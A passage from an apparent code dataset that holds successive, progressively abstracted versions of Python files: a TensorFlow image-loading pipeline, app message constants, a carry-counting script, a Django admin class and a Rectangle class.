dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\n<function token>\n\n\ndef inference_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode_inference,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images_inference,\n height=params.height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n",
"<import token>\n\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n mean = 0.5\n proimages = (images - mean) / mean\n return proimages\n\n\ndef _parse_and_decode(filename, dataset_directory):\n \"\"\"\n\n Args:\n filename:\n dataset_directory:\n\n Returns:\n\n \"\"\"\n filename_split = tf.unstack(tf.string_split([filename], '_').values[:-1\n ], num=3)\n strip_filename = tf.string_join(filename_split, '_')\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n la_dir = tf.cast(os.path.join(dataset_directory, 'panoptic_proc/'), tf.\n string)\n im_ext = tf.cast('.png', tf.string)\n la_ext = tf.cast('_gtFine_instanceIds.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n la_filename = tf.string_join([la_dir, strip_filename, la_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n la_dec = tf.image.decode_png(tf.read_file(la_filename))\n return im_dec, la_dec\n\n\ndef _parse_and_decode_inference(filename, dataset_directory):\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n im_ext = tf.cast('.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n im_dec_raw = im_dec\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n return im_dec, im_filename, im_dec_raw\n\n\ndef _preprocess_images(image, label, params):\n if params.random_flip:\n label = tf.cast(tf.expand_dims(label, -1), tf.float32)\n im_la = tf.concat([image, label], axis=-1)\n im_la = tf.image.random_flip_left_right(im_la)\n image = im_la[..., 0:3]\n label = im_la[..., 3]\n label = tf.cast(label, tf.uint8)\n label = tf.squeeze(label)\n image.set_shape([params.height_input, params.width_input, 3])\n label.set_shape([params.height_input, params.width_input])\n return image, label\n\n\n<function token>\n\n\ndef _resize_images_inference(image, im_filename, im_raw, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n im_res.set_shape([height, width, 3])\n return im_res, im_filename, im_raw\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\n<function token>\n\n\ndef inference_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode_inference,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images_inference,\n height=params.height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n",
"<import token>\n\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n mean = 0.5\n proimages = (images - mean) / mean\n return proimages\n\n\ndef _parse_and_decode(filename, dataset_directory):\n \"\"\"\n\n Args:\n filename:\n dataset_directory:\n\n Returns:\n\n \"\"\"\n filename_split = tf.unstack(tf.string_split([filename], '_').values[:-1\n ], num=3)\n strip_filename = tf.string_join(filename_split, '_')\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n la_dir = tf.cast(os.path.join(dataset_directory, 'panoptic_proc/'), tf.\n string)\n im_ext = tf.cast('.png', tf.string)\n la_ext = tf.cast('_gtFine_instanceIds.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n la_filename = tf.string_join([la_dir, strip_filename, la_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n la_dec = tf.image.decode_png(tf.read_file(la_filename))\n return im_dec, la_dec\n\n\n<function token>\n\n\ndef _preprocess_images(image, label, params):\n if params.random_flip:\n label = tf.cast(tf.expand_dims(label, -1), tf.float32)\n im_la = tf.concat([image, label], axis=-1)\n im_la = tf.image.random_flip_left_right(im_la)\n image = im_la[..., 0:3]\n label = im_la[..., 3]\n label = tf.cast(label, tf.uint8)\n label = tf.squeeze(label)\n image.set_shape([params.height_input, params.width_input, 3])\n label.set_shape([params.height_input, params.width_input])\n return image, label\n\n\n<function token>\n\n\ndef _resize_images_inference(image, im_filename, im_raw, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n im_res.set_shape([height, width, 3])\n return im_res, im_filename, im_raw\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\n<function token>\n\n\ndef inference_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode_inference,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images_inference,\n height=params.height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n",
"<import token>\n\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n mean = 0.5\n proimages = (images - mean) / mean\n return proimages\n\n\ndef _parse_and_decode(filename, dataset_directory):\n \"\"\"\n\n Args:\n filename:\n dataset_directory:\n\n Returns:\n\n \"\"\"\n filename_split = tf.unstack(tf.string_split([filename], '_').values[:-1\n ], num=3)\n strip_filename = tf.string_join(filename_split, '_')\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n la_dir = tf.cast(os.path.join(dataset_directory, 'panoptic_proc/'), tf.\n string)\n im_ext = tf.cast('.png', tf.string)\n la_ext = tf.cast('_gtFine_instanceIds.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n la_filename = tf.string_join([la_dir, strip_filename, la_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n la_dec = tf.image.decode_png(tf.read_file(la_filename))\n return im_dec, la_dec\n\n\n<function token>\n\n\ndef _preprocess_images(image, label, params):\n if params.random_flip:\n label = tf.cast(tf.expand_dims(label, -1), tf.float32)\n im_la = tf.concat([image, label], axis=-1)\n im_la = tf.image.random_flip_left_right(im_la)\n image = im_la[..., 0:3]\n label = im_la[..., 3]\n label = tf.cast(label, tf.uint8)\n label = tf.squeeze(label)\n image.set_shape([params.height_input, params.width_input, 3])\n label.set_shape([params.height_input, params.width_input])\n return image, label\n\n\n<function token>\n<function token>\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\n<function token>\n\n\ndef inference_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode_inference,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images_inference,\n height=params.height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n",
"<import token>\n\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n mean = 0.5\n proimages = (images - mean) / mean\n return proimages\n\n\n<function token>\n<function token>\n\n\ndef _preprocess_images(image, label, params):\n if params.random_flip:\n label = tf.cast(tf.expand_dims(label, -1), tf.float32)\n im_la = tf.concat([image, label], axis=-1)\n im_la = tf.image.random_flip_left_right(im_la)\n image = im_la[..., 0:3]\n label = im_la[..., 3]\n label = tf.cast(label, tf.uint8)\n label = tf.squeeze(label)\n image.set_shape([params.height_input, params.width_input, 3])\n label.set_shape([params.height_input, params.width_input])\n return image, label\n\n\n<function token>\n<function token>\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\n<function token>\n\n\ndef inference_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode_inference,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images_inference,\n height=params.height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n",
"<import token>\n\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n mean = 0.5\n proimages = (images - mean) / mean\n return proimages\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\n<function token>\n\n\ndef inference_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode_inference,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images_inference,\n height=params.height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n",
"<import token>\n\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n mean = 0.5\n proimages = (images - mean) / mean\n return proimages\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\n<function token>\n<function token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\n<function token>\n<function token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n"
] | false |
99,868 | cc84f2e1234aaa14adcd701460577c56d80556c0 | STR_REGISTRATION_SUCCESS = 'Registration successful'
STR_LOGIN_SUCCESS = 'Login successful'
STR_INVALID_EMAIL = 'Invalid email id provided'
STR_INVALID_MOBILE = 'Invalid mobile number provided'
STR_INVALID_GENDER = 'Invalid gender provided'
STR_FAMILY_ADDITION_SUCCESS = 'Family added successfully'
STR_RELATIONSHIP_ADDITION_SUCCESS = 'Relationship added successfully'
STR_RELATIVES_ADDITION_SUCCESS = 'Relatives added successfully'
STR_INVALID_PERSON = 'User information not available'
STR_INVALID_RELATIONSHIP = 'User information not available'
STR_SEARCH_SUCCESS = 'Search retrieved successfully'
STR_LOGIN_FAILED = 'Mobile number or password is invalid'
| [
"STR_REGISTRATION_SUCCESS = 'Registration successful'\n\nSTR_LOGIN_SUCCESS = 'Login successful'\n\nSTR_INVALID_EMAIL = 'Invalid email id provided'\nSTR_INVALID_MOBILE = 'Invalid mobile number provided'\nSTR_INVALID_GENDER = 'Invalid gender provided'\n\nSTR_FAMILY_ADDITION_SUCCESS = 'Family added successfully'\n\nSTR_RELATIONSHIP_ADDITION_SUCCESS = 'Relationship added successfully'\n\nSTR_RELATIVES_ADDITION_SUCCESS = 'Relatives added successfully'\n\n\nSTR_INVALID_PERSON = 'User information not available'\n\nSTR_INVALID_RELATIONSHIP = 'User information not available'\n\nSTR_SEARCH_SUCCESS = 'Search retrieved successfully'\n\nSTR_LOGIN_FAILED = 'Mobile number or password is invalid'\n",
"STR_REGISTRATION_SUCCESS = 'Registration successful'\nSTR_LOGIN_SUCCESS = 'Login successful'\nSTR_INVALID_EMAIL = 'Invalid email id provided'\nSTR_INVALID_MOBILE = 'Invalid mobile number provided'\nSTR_INVALID_GENDER = 'Invalid gender provided'\nSTR_FAMILY_ADDITION_SUCCESS = 'Family added successfully'\nSTR_RELATIONSHIP_ADDITION_SUCCESS = 'Relationship added successfully'\nSTR_RELATIVES_ADDITION_SUCCESS = 'Relatives added successfully'\nSTR_INVALID_PERSON = 'User information not available'\nSTR_INVALID_RELATIONSHIP = 'User information not available'\nSTR_SEARCH_SUCCESS = 'Search retrieved successfully'\nSTR_LOGIN_FAILED = 'Mobile number or password is invalid'\n",
"<assignment token>\n"
] | false |
99,869 | e01aa97cf3364a9b5228c8e9efa9af0c1f665c0a | while True:
number_a, number_b = input().split()
if number_a == number_b == '0':
break
number_b = ('{:0>' + str(len(number_a)) + '}').format(number_b)
number_a = ('{:0>' + str(len(number_b)) + '}').format(number_a)
carry = 0
total_carries = 0
for i in reversed(range(len(number_a))):
carry = int(int(number_a[i]) + int(number_b[i]) + carry > 9)
total_carries += carry
if total_carries == 0:
print('No carry operation.')
elif total_carries == 1:
print('1 carry operation.')
else:
print('{} carry operations.'.format(total_carries))
| [
"while True:\n number_a, number_b = input().split()\n if number_a == number_b == '0':\n break\n\n number_b = ('{:0>' + str(len(number_a)) + '}').format(number_b)\n number_a = ('{:0>' + str(len(number_b)) + '}').format(number_a)\n\n carry = 0\n total_carries = 0\n for i in reversed(range(len(number_a))):\n carry = int(int(number_a[i]) + int(number_b[i]) + carry > 9)\n total_carries += carry\n if total_carries == 0:\n print('No carry operation.')\n elif total_carries == 1:\n print('1 carry operation.')\n else:\n print('{} carry operations.'.format(total_carries))\n",
"while True:\n number_a, number_b = input().split()\n if number_a == number_b == '0':\n break\n number_b = ('{:0>' + str(len(number_a)) + '}').format(number_b)\n number_a = ('{:0>' + str(len(number_b)) + '}').format(number_a)\n carry = 0\n total_carries = 0\n for i in reversed(range(len(number_a))):\n carry = int(int(number_a[i]) + int(number_b[i]) + carry > 9)\n total_carries += carry\n if total_carries == 0:\n print('No carry operation.')\n elif total_carries == 1:\n print('1 carry operation.')\n else:\n print('{} carry operations.'.format(total_carries))\n",
"<code token>\n"
] | false |
99,870 | 7a34812cd7bdb4052dc58327f1fe35e6082e0c27 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from userApp.models import Petugas, Anggota
from django.contrib.auth.models import User
# Register your models here.
class AnggotaAdmin(admin.ModelAdmin):
list_per_page = 10
list_display = ('nis','nama','jk','agama','ttl','alamat','get_email',
'get_username')
list_filter = ('jk','agama')
search_fields = ('nis','nama','ttl','get_username')
def get_username(self, obj):
return obj.user.username
get_username.short_description = 'User'
get_username.admin_order_field = 'user__username'
def get_email(self, obj):
return obj.user.email
get_email.short_description = 'User'
get_email.admin_order_field = 'user__email'
# def get_status_siswa(self, obj):
# return obj.user.is_active
# get_status.short_description = 'User'
# get_status.admin_order_field = 'user__is_active'
admin.site.register(Petugas)
admin.site.register(Anggota,AnggotaAdmin)
| [
"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n\nfrom django.contrib import admin\nfrom userApp.models import Petugas, Anggota\nfrom django.contrib.auth.models import User\n\n# Register your models here.\nclass AnggotaAdmin(admin.ModelAdmin):\n\tlist_per_page = 10\n\tlist_display = ('nis','nama','jk','agama','ttl','alamat','get_email',\n\t\t'get_username')\n\tlist_filter = ('jk','agama')\n\tsearch_fields = ('nis','nama','ttl','get_username')\n\n\tdef get_username(self, obj):\n\t\treturn obj.user.username\n\tget_username.short_description = 'User'\n\tget_username.admin_order_field = 'user__username'\n\n\tdef get_email(self, obj):\n\t\treturn obj.user.email\n\tget_email.short_description = 'User'\n\tget_email.admin_order_field = 'user__email'\n\n\t# def get_status_siswa(self, obj):\n\t# \treturn obj.user.is_active\n\t# get_status.short_description = 'User'\n\t# get_status.admin_order_field = 'user__is_active'\n\nadmin.site.register(Petugas)\nadmin.site.register(Anggota,AnggotaAdmin)\n",
"from __future__ import unicode_literals\nfrom django.contrib import admin\nfrom userApp.models import Petugas, Anggota\nfrom django.contrib.auth.models import User\n\n\nclass AnggotaAdmin(admin.ModelAdmin):\n list_per_page = 10\n list_display = ('nis', 'nama', 'jk', 'agama', 'ttl', 'alamat',\n 'get_email', 'get_username')\n list_filter = 'jk', 'agama'\n search_fields = 'nis', 'nama', 'ttl', 'get_username'\n\n def get_username(self, obj):\n return obj.user.username\n get_username.short_description = 'User'\n get_username.admin_order_field = 'user__username'\n\n def get_email(self, obj):\n return obj.user.email\n get_email.short_description = 'User'\n get_email.admin_order_field = 'user__email'\n\n\nadmin.site.register(Petugas)\nadmin.site.register(Anggota, AnggotaAdmin)\n",
"<import token>\n\n\nclass AnggotaAdmin(admin.ModelAdmin):\n list_per_page = 10\n list_display = ('nis', 'nama', 'jk', 'agama', 'ttl', 'alamat',\n 'get_email', 'get_username')\n list_filter = 'jk', 'agama'\n search_fields = 'nis', 'nama', 'ttl', 'get_username'\n\n def get_username(self, obj):\n return obj.user.username\n get_username.short_description = 'User'\n get_username.admin_order_field = 'user__username'\n\n def get_email(self, obj):\n return obj.user.email\n get_email.short_description = 'User'\n get_email.admin_order_field = 'user__email'\n\n\nadmin.site.register(Petugas)\nadmin.site.register(Anggota, AnggotaAdmin)\n",
"<import token>\n\n\nclass AnggotaAdmin(admin.ModelAdmin):\n list_per_page = 10\n list_display = ('nis', 'nama', 'jk', 'agama', 'ttl', 'alamat',\n 'get_email', 'get_username')\n list_filter = 'jk', 'agama'\n search_fields = 'nis', 'nama', 'ttl', 'get_username'\n\n def get_username(self, obj):\n return obj.user.username\n get_username.short_description = 'User'\n get_username.admin_order_field = 'user__username'\n\n def get_email(self, obj):\n return obj.user.email\n get_email.short_description = 'User'\n get_email.admin_order_field = 'user__email'\n\n\n<code token>\n",
"<import token>\n\n\nclass AnggotaAdmin(admin.ModelAdmin):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def get_username(self, obj):\n return obj.user.username\n <assignment token>\n <assignment token>\n\n def get_email(self, obj):\n return obj.user.email\n <assignment token>\n <assignment token>\n\n\n<code token>\n",
"<import token>\n\n\nclass AnggotaAdmin(admin.ModelAdmin):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n <assignment token>\n <assignment token>\n\n def get_email(self, obj):\n return obj.user.email\n <assignment token>\n <assignment token>\n\n\n<code token>\n",
"<import token>\n\n\nclass AnggotaAdmin(admin.ModelAdmin):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n <assignment token>\n <assignment token>\n <function token>\n <assignment token>\n <assignment token>\n\n\n<code token>\n",
"<import token>\n<class token>\n<code token>\n"
] | false |
99,871 | 96bc5fcb19aa262418b96c1543b2726d0e77254a | #!/usr/bin/python3
""" Module that defines Rectangle class (inherits from Base) """
from models.base import Base
class Rectangle(Base):
""" Defines attributes and methods of Rectangle class """
def __init__(self, width, height, x=0, y=0, id=None):
""" Instantiates all attributes of class """
self.width = width
self.height = height
self.x = x
self.y = y
super().__init__(id)
def data_validator(self, name, value):
""" Validates proper integer input """
if type(value) is not int:
raise TypeError("{} must be an integer".format(name))
if name == "height" or name == "width":
if value <= 0:
raise ValueError("{} must be > 0".format(name))
else:
if value < 0:
raise ValueError("{} must be >= 0".format(name))
def area(self):
""" Calculates area """
return self.width * self.height
def display(self):
""" Prints rectangle instance of #s """
""" Coordinates for position are x-axis (LR) and y-axis (NS) """
for coordY in range(self.y):
print()
for column in range(self.height):
for coordLR in range(self.x):
print(" ", end="")
for row in range(self.width):
print("#", end="")
print()
def update(self, *args, **kwargs):
""" Updates attribute values after initialization """
arg_name = ['id', 'width', 'height', 'x', 'y']
""" If args only, sets attribute to correct arg_name """
if len(args) > 0:
numArgs = 0
for attr in range(len(args)):
setattr(self, arg_name[numArgs], args[numArgs])
numArgs += 1
""" Put kwargs into dict - if key matches arg_name, set to value """
kwargs_dict = kwargs
for key, value in kwargs_dict.items():
for attr in range(len(arg_name)):
if key == arg_name[attr]:
setattr(self, arg_name[attr], value)
def to_dictionary(self):
""" Returns dictionary representation of rectangle """
dict_rect = {}
dict_rect["id"] = self.id
dict_rect["width"] = self.width
dict_rect["height"] = self.height
dict_rect["x"] = self.x
dict_rect["y"] = self.y
return dict_rect
def __str__(self):
""" Builtin that produces readable output """
return "[{}] ({}) {}/{} - {}/{}".format(self.__class__.__name__,
self.id, self.x, self.y,
self.width, self.height)
@property
def width(self):
""" Gets private width attribute """
return self.__width
@width.setter
def width(self, value):
""" Sets width attribute with exceptions """
self.data_validator("width", value)
self.__width = value
@property
def height(self):
""" Gets private height attribute """
return self.__height
@height.setter
def height(self, value):
""" Sets height attribute with exceptions """
self.data_validator("height", value)
self.__height = value
@property
def x(self):
""" Gets private x attribute """
return self.__x
@x.setter
def x(self, value):
""" Sets x attribute with exceptions """
self.data_validator("x", value)
self.__x = value
@property
def y(self):
""" Gets private y attribute """
return self.__y
@y.setter
def y(self, value):
""" Sets y attribute with exceptions """
self.data_validator("y", value)
self.__y = value
| [
"#!/usr/bin/python3\n\n\"\"\" Module that defines Rectangle class (inherits from Base) \"\"\"\n\n\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\" Defines attributes and methods of Rectangle class \"\"\"\n\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" Instantiates all attributes of class \"\"\"\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id)\n\n def data_validator(self, name, value):\n \"\"\" Validates proper integer input \"\"\"\n if type(value) is not int:\n raise TypeError(\"{} must be an integer\".format(name))\n if name == \"height\" or name == \"width\":\n if value <= 0:\n raise ValueError(\"{} must be > 0\".format(name))\n else:\n if value < 0:\n raise ValueError(\"{} must be >= 0\".format(name))\n\n def area(self):\n \"\"\" Calculates area \"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\" Prints rectangle instance of #s \"\"\"\n \"\"\" Coordinates for position are x-axis (LR) and y-axis (NS) \"\"\"\n for coordY in range(self.y):\n print()\n for column in range(self.height):\n for coordLR in range(self.x):\n print(\" \", end=\"\")\n for row in range(self.width):\n print(\"#\", end=\"\")\n print()\n\n def update(self, *args, **kwargs):\n \"\"\" Updates attribute values after initialization \"\"\"\n arg_name = ['id', 'width', 'height', 'x', 'y']\n \"\"\" If args only, sets attribute to correct arg_name \"\"\"\n if len(args) > 0:\n numArgs = 0\n for attr in range(len(args)):\n setattr(self, arg_name[numArgs], args[numArgs])\n numArgs += 1\n \"\"\" Put kwargs into dict - if key matches arg_name, set to value \"\"\"\n kwargs_dict = kwargs\n for key, value in kwargs_dict.items():\n for attr in range(len(arg_name)):\n if key == arg_name[attr]:\n setattr(self, arg_name[attr], value)\n\n def to_dictionary(self):\n \"\"\" Returns dictionary representation of rectangle \"\"\"\n dict_rect = {}\n dict_rect[\"id\"] = self.id\n dict_rect[\"width\"] = self.width\n dict_rect[\"height\"] = self.height\n dict_rect[\"x\"] = self.x\n dict_rect[\"y\"] = self.y\n return dict_rect\n\n def __str__(self):\n \"\"\" Builtin that produces readable output \"\"\"\n return \"[{}] ({}) {}/{} - 